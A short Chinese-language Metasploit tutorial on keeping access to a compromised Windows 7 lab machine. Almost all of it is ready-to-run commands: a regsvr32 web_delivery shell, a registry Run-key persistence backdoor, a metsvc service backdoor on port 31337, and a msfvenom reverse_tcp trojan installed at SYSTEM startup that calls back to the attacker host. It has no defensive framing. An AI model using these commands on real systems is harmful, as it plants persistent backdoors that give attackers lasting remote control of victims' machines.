MSF權限維持
環境搭建
目標機:win7 ip:192.168.224.133
攻擊機:kali linux ip:192.168.224.129
首先使用web_delivery模塊的regsvr32獲取shell,
1、啟動msfconsole
2、使用web_delivery模塊
3、設置payload
4、設置監聽主機和端口
5、設置Regsvr32目標,
6、run運行,生成一個可執行文件,
7、將文件拿到win7目標機上運行。
8、輸入sessions,查看session內容
9、輸入sessions -i 1 ,可以拿到目標機返回的會話
使用metasploit自帶的后門進行權限維持
一、persistence啟動項后門
run persistence -h ###查看幫助
run persistence -X -i 2 -p 8888 -r 192.168.224.129 ##### -X指定啟動的方式為開機自啟動,-i反向連接的時間間隔(2s) –r 指定攻擊者的IP
在目標機C盤 C:\Users\plume\AppData\Local\Temp\下生成了一個vbs文件,
在注冊表HKLM\Software\Microsoft\Windows\CurrentVersion\Run下加入了開機啟動項
連接后門,拿到返回的會話
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.224.129
set LPORT 8888
run
二、metsvc服務后門
在C:\Users\plume\AppData\Local\Temp\上傳了三個文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通過服務啟動,服務名為meterpreter
run metsvc –h # 查看幫助
run metsvc –A #自動安裝后門
run metsvc -r #卸載現有的meterpreter服務(已生成的文件需要自己刪除)
可以看到成功生成了后門文件,並且啟動了meterpreter服務。
連接后門,拿到返回會話
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.224.133
set LPORT 31337
run
三、通過persistence_exe自定義后門文件
1、使用msfvenom生成一個木馬文件。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.224.129 lport=6666 -f exe -o ~/233.exe
2、通過persistence_exe設置參數,運行,成功返回shell,
run post/windows/manage/persistence_exe rexename=233.exe rexepath=~/233.exe session=1 startup=SYSTEM
rexename:上傳到目標機的木馬文件
rexepath:當前kali中木馬所在的完整路徑
session:之前獲取的session會話
startup:運行該后門的權限
3、連接后門,並將目標機關機重啟,可以成功返回會話。
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.224.129
set lport 6666
run